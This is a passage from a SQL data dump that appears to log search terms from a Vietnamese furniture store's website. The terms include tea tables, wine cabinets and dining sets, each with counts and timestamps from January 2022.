15:15:04'),(17554,'_bt',0,1,NULL,9,1,1,0,'2022-01-07 15:15:10'),(17565,'Bàn tr',144,2,NULL,9,1,1,0,'2022-01-07 16:19:12'),(17572,'Bàn t',144,1,NULL,9,1,1,0,'2022-01-07 16:19:10'),(17604,'tủ rượu',69,9,NULL,9,1,1,0,'2022-01-08 02:48:37'),(17627,'CN3',1,1,NULL,9,1,1,0,'2022-01-08 07:21:05'),(17691,'bàn ghế ăn',476,8,NULL,9,1,1,0,'2022-01-10 01:36:33'),(17707,'Bàn trà xoay',159,1,NULL,9,1,1,0,'2022-01-10 01:39:59'),(17709,'Bàn trà xoay chân mạ titan',371,2,NULL,9,1,1,0,'2022-01-10 01:40:04'),(17718,'đen trà',107,1,NULL,9,1,1,0,'2022-01-10 02:04:43'),(17720,'đen trần',63,3,NULL,9,1,1,0,'2022-01-10 02:04:58');

--
